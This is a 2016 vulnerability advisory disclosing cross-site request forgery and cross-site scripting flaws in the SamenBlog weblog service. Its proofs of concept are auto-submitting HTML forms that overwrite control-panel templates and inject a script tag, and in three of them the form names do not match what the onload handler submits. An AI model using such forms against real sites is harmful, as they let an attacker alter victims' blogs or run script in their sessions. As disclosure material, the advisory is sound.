SamenBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting
Posted on 23 February 2016
Document Title: =============== SamenBlog Weblog Service - Cross Site Request Forgery / Cross Site Scripting References (Source): ==================== http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt Release Date: ============= 2016-02-20 Product & Service Introduction: =============================== Samenblog allows its users to publish their information, memories, essays, etc to experience and enjoy a professional weblog-publishing system in a basic environment and also it has tried to provide a system for both professional and amateur users. Vulnerability Type: ========================= Cross Site Request Forgery Cross Site Scripting Vulnerability Details: ============================== I discovered a client-side cross site request forgery web vulnerability and a cross site scripting vulnerability in Samenblog.com (Weblog Service). Author: ================= Ehsan Hosseini http://ehsansec.ir/ Exploitation Technique: ======================= Remote Severity Level: =============== Medium Proof of Concept (PoC): ======================= -- Cross Site Request Forgery -- -- PoC : Edit Themes -- -- PoC 1 -- <html> <head> <title>Edit Weblog Template - Csrf</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='info'> <input type="hidden" name="template" value="<h1> PoC </h1>"> <input type='hidden' name='task' value='doedit'> </form> </body> -- PoC 2 -- <html> <head> <title>Edit The extra pages templates - Csrf</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='infoo'> <input name='templatepage' value="<h1> PoC </h1>"> <input type='hidden' name='task' value='doeditpage'> </form> </body> </html> -- PoC 3 -- <html> <head> <title>Edit The archive templates - Csrf</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='infooo'> <input name='templatearchive' value="<h1> PoC </h1>"> <input type='hidden' name='task' value='doeditarchive'> </form> </body> </html> -- Cross Site Scripting -- <html> <head> <title>Cross Site Scripting</title> </head> <body onload="document.info.submit()"> <form action='http://samenblog.com/cpanel/preview.php' method='POST' name='preview'> <input name='templatearchive' value="<script>alert('Ehsan')</script>"> </form> </body> </html> Author: ================== Ehsan Hosseini http://ehsansec.ir/ Contact: ======== hehsan979@gmail.com info@ehsansec.ir
